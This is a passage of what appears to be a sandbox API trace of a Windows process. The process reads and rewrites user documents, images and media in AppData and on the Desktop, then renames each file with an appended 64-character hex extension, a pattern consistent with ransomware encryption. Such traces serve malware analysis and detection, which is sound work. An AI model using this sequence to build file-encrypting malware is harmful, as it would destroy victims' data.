0x4276650 [0165.676] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x708f9d4, FileInformation=0x4276650, Length=0x11c, FileInformationClass=0xa) returned 0x0 [0165.679] CloseHandle (hObject=0x5e4) returned 1 [0165.680] GetProcessHeap () returned 0x270000 [0165.681] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0165.681] RtlInterlockedCompareExchange64 () returned 0x1 [0165.681] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.685] ReadFile (in: hFile=0x5e4, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0165.690] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.692] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x73e00f8, ReturnLength=0x708f9e4) returned 0x0 [0165.693] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\qoQusl.m4a", lpString2=".13D7727BD4961ACF26BCC63E1A9A27F416F55DC5EE327E3D0681E94A82973538" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\qoQusl.m4a.13D7727BD4961ACF26BCC63E1A9A27F416F55DC5EE327E3D0681E94A82973538") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\qoQusl.m4a.13D7727BD4961ACF26BCC63E1A9A27F416F55DC5EE327E3D0681E94A82973538" [0165.693] GetProcessHeap () returned 0x270000 [0165.693] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11a) returned 0x4276778 [0165.693] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x708f9d4, FileInformation=0x4276778, Length=0x11a, FileInformationClass=0xa) returned 0x0 [0165.694] CloseHandle (hObject=0x5e4) returned 1 [0165.696] GetProcessHeap () returned 0x270000 [0165.697] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0165.697] RtlInterlockedCompareExchange64 () returned 0x1 [0165.697] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.701] ReadFile (in: hFile=0x5e4, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0165.701] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.703] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x73e00f8, ReturnLength=0x708f9e4) returned 0x0 [0165.704] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\QSp2x.ods", lpString2=".074E09C1A77E31B302DE15E4DE192FC08564B4AFFC9B6035479B6274485BBC1F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\QSp2x.ods.074E09C1A77E31B302DE15E4DE192FC08564B4AFFC9B6035479B6274485BBC1F") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\QSp2x.ods.074E09C1A77E31B302DE15E4DE192FC08564B4AFFC9B6035479B6274485BBC1F" [0165.704] GetProcessHeap () returned 0x270000 [0165.704] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x118) returned 0x42768a0 [0165.704] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x708f9d4, FileInformation=0x42768a0, Length=0x118, FileInformationClass=0xa) returned 0x0 [0165.706] CloseHandle (hObject=0x5e4) returned 1 [0165.707] GetProcessHeap () returned 0x270000 [0165.708] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0165.708] RtlInterlockedCompareExchange64 () returned 0x1 [0165.708] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.711] ReadFile (in: hFile=0x5e4, lpBuffer=0x7400180, nNumberOfBytesToRead=0x6200, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0165.711] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.713] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x73e00f8, ReturnLength=0x708f9e4) returned 0x0 [0165.714] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\RBbwYGkm_WNBvZLE_av.png", lpString2=".6E39806B12DF61A00DA35CAF2E3A3E2C06E493F35873A6035B58F0BC5633B53A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\RBbwYGkm_WNBvZLE_av.png.6E39806B12DF61A00DA35CAF2E3A3E2C06E493F35873A6035B58F0BC5633B53A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\RBbwYGkm_WNBvZLE_av.png.6E39806B12DF61A00DA35CAF2E3A3E2C06E493F35873A6035B58F0BC5633B53A" [0165.714] GetProcessHeap () returned 0x270000 [0165.714] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x134) returned 0x4262de0 [0165.714] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x708f9d4, FileInformation=0x4262de0, Length=0x134, FileInformationClass=0xa) returned 0x0 [0165.716] CloseHandle (hObject=0x5e4) returned 1 [0165.716] GetProcessHeap () returned 0x270000 [0165.718] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0165.718] RtlInterlockedCompareExchange64 () returned 0x1 [0165.718] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.719] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x6000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0165.721] RtlInterlockedCompareExchange64 () returned 0x0 [0165.721] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.734] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x76900b8, ReturnLength=0x708f9e4) returned 0x0 [0165.735] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Nt0kouwsI.jpg", lpString2=".1C523A7BAFD40988E6967FD3D88417BA4CD837F495288E0E9819A212BA7D332A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Nt0kouwsI.jpg.1C523A7BAFD40988E6967FD3D88417BA4CD837F495288E0E9819A212BA7D332A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Nt0kouwsI.jpg.1C523A7BAFD40988E6967FD3D88417BA4CD837F495288E0E9819A212BA7D332A" [0165.735] GetProcessHeap () returned 0x270000 [0165.735] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x120) returned 0x4276af0 [0165.735] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x708f9d4, FileInformation=0x4276af0, Length=0x120, FileInformationClass=0xa) returned 0x0 [0165.737] CloseHandle (hObject=0x5b8) returned 1 [0165.738] GetProcessHeap () returned 0x270000 [0165.739] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0165.739] RtlInterlockedCompareExchange64 () returned 0x1 [0165.739] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.746] ReadFile (in: hFile=0x5b8, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0165.746] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.750] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x2400, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0165.750] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.756] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x76900b8, ReturnLength=0x708f9e4) returned 0x0 [0165.757] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\s1X1py5zOF.pptx", lpString2=".9FAE2EADCCD86898B268788BEFE13368019D1F6DA9DA63D73ADF6AD9C4A2CF16" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\s1X1py5zOF.pptx.9FAE2EADCCD86898B268788BEFE13368019D1F6DA9DA63D73ADF6AD9C4A2CF16") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\s1X1py5zOF.pptx.9FAE2EADCCD86898B268788BEFE13368019D1F6DA9DA63D73ADF6AD9C4A2CF16" [0165.757] GetProcessHeap () returned 0x270000 [0165.757] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x124) returned 0x741c440 [0165.757] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x708f9d4, FileInformation=0x741c440, Length=0x124, FileInformationClass=0xa) returned 0x0 [0165.760] CloseHandle (hObject=0x598) returned 1 [0165.761] GetProcessHeap () returned 0x270000 [0165.762] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0165.763] RtlInterlockedCompareExchange64 () returned 0x1 [0165.763] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.767] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0165.768] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.770] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x76900b8, ReturnLength=0x708f9e4) returned 0x0 [0165.771] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\UO5iMAxdE5LXqP1Rk D1.gif", lpString2=".8A50E024101A76C7892D4F598622B6E1B9A1BFBD7CE511E4EC334EF114A51013" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\UO5iMAxdE5LXqP1Rk D1.gif.8A50E024101A76C7892D4F598622B6E1B9A1BFBD7CE511E4EC334EF114A51013") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\UO5iMAxdE5LXqP1Rk D1.gif.8A50E024101A76C7892D4F598622B6E1B9A1BFBD7CE511E4EC334EF114A51013" [0165.771] GetProcessHeap () returned 0x270000 [0165.771] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x136) returned 0x4262f28 [0165.771] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x708f9d4, FileInformation=0x4262f28, Length=0x136, FileInformationClass=0xa) returned 0x0 [0165.816] CloseHandle (hObject=0x598) returned 1 [0165.825] GetProcessHeap () returned 0x270000 [0165.826] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0165.826] RtlInterlockedCompareExchange64 () returned 0x2 [0165.826] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.853] ReadFile (in: hFile=0x5a4, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0165.854] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.861] ReadFile (in: hFile=0x598, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0165.861] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.869] ReadFile (in: hFile=0x58c, lpBuffer=0x7492450, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318) returned 1 [0165.869] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.870] WriteFile (in: hFile=0x58c, lpBuffer=0x7492450*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318) returned 1 [0165.873] RtlInterlockedCompareExchange64 () returned 0x1 [0165.873] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.881] ReadFile (in: hFile=0x5b0, lpBuffer=0x7610188, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75f0050 | out: lpBuffer=0x7610188*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75f0050) returned 1 [0165.884] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.894] ReadFile (in: hFile=0x590, lpBuffer=0x76382e0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x76181a8 | out: lpBuffer=0x76382e0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76181a8) returned 1 [0165.894] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.895] WriteFile (in: hFile=0x590, lpBuffer=0x76382e0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76181a8 | out: lpBuffer=0x76382e0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76181a8) returned 1 [0165.896] RtlInterlockedCompareExchange64 () returned 0x2 [0165.896] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.896] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x7618258, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x7618258, ReturnLength=0x708f9e4) returned 0x0 [0165.898] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\0W_eZ.png", lpString2=".6F190DB49F6E357CD6E6E0D4CDC551425F933C61112BDD0A128E45B45D191F7F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\0W_eZ.png.6F190DB49F6E357CD6E6E0D4CDC551425F933C61112BDD0A128E45B45D191F7F") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\0W_eZ.png.6F190DB49F6E357CD6E6E0D4CDC551425F933C61112BDD0A128E45B45D191F7F" [0165.898] GetProcessHeap () returned 0x270000 [0165.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x118) returned 0x4276c18 [0165.898] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x708f9d4, FileInformation=0x4276c18, Length=0x118, FileInformationClass=0xa) returned 0x0 [0165.900] CloseHandle (hObject=0x590) returned 1 [0165.902] GetProcessHeap () returned 0x270000 [0165.903] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76181a8 | out: hHeap=0x270000) returned 1 [0165.903] RtlInterlockedCompareExchange64 () returned 0x3 [0165.903] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.908] ReadFile (in: hFile=0x590, lpBuffer=0x76382e0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x76181a8 | out: lpBuffer=0x76382e0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76181a8) returned 1 [0165.909] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.910] WriteFile (in: hFile=0x590, lpBuffer=0x76382e0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76181a8 | out: lpBuffer=0x76382e0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76181a8) returned 1 [0165.911] RtlInterlockedCompareExchange64 () returned 0x2 [0165.911] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.911] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x7618258, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x7618258, ReturnLength=0x708f9e4) returned 0x0 [0165.912] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\fCOxneQ.ods", lpString2=".28E9B4F881131ABCFBA23DD6244A0EE710A5A68570B129D6ADA5761D01592D17" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\fCOxneQ.ods.28E9B4F881131ABCFBA23DD6244A0EE710A5A68570B129D6ADA5761D01592D17") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\fCOxneQ.ods.28E9B4F881131ABCFBA23DD6244A0EE710A5A68570B129D6ADA5761D01592D17" [0165.912] GetProcessHeap () returned 0x270000 [0165.912] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11c) returned 0x4276d40 [0165.913] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x708f9d4, FileInformation=0x4276d40, Length=0x11c, FileInformationClass=0xa) returned 0x0 [0165.914] CloseHandle (hObject=0x590) returned 1 [0165.915] GetProcessHeap () returned 0x270000 [0165.917] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76181a8 | out: hHeap=0x270000) returned 1 [0165.917] RtlInterlockedCompareExchange64 () returned 0x3 [0165.917] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.923] ReadFile (in: hFile=0x590, lpBuffer=0x76382e0, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x76181a8 | out: lpBuffer=0x76382e0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76181a8) returned 1 [0165.924] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.924] WriteFile (in: hFile=0x590, lpBuffer=0x76382e0*, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76181a8 | out: lpBuffer=0x76382e0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76181a8) returned 1 [0165.925] RtlInterlockedCompareExchange64 () returned 0x2 [0165.925] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.925] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x7618258, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x7618258, ReturnLength=0x708f9e4) returned 0x0 [0165.926] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\oHGOlTifeSET7B2 HWLe.flv", lpString2=".69A613596AA422F380B86EF11509C43E389604D41051F4DF51259CC789BFE50B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\oHGOlTifeSET7B2 HWLe.flv.69A613596AA422F380B86EF11509C43E389604D41051F4DF51259CC789BFE50B") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\oHGOlTifeSET7B2 HWLe.flv.69A613596AA422F380B86EF11509C43E389604D41051F4DF51259CC789BFE50B" [0165.927] GetProcessHeap () returned 0x270000 [0165.927] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x136) returned 0x4263070 [0165.927] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x708f9d4, FileInformation=0x4263070, Length=0x136, FileInformationClass=0xa) returned 0x0 [0165.938] CloseHandle (hObject=0x590) returned 1 [0165.939] GetProcessHeap () returned 0x270000 [0165.941] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76181a8 | out: hHeap=0x270000) returned 1 [0165.941] RtlInterlockedCompareExchange64 () returned 0x3 [0165.941] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0165.942] NtQueryObject (in: Handle=0x304, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x7422118, ReturnLength=0x708f9e4) returned 0x0 [0165.943] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZUHdN4Zd.m4a", lpString2=".C4E75180B7201C50EFA4E48DD8EBD22A8DAA5E66265EA821106D149F02EC196D" | out: 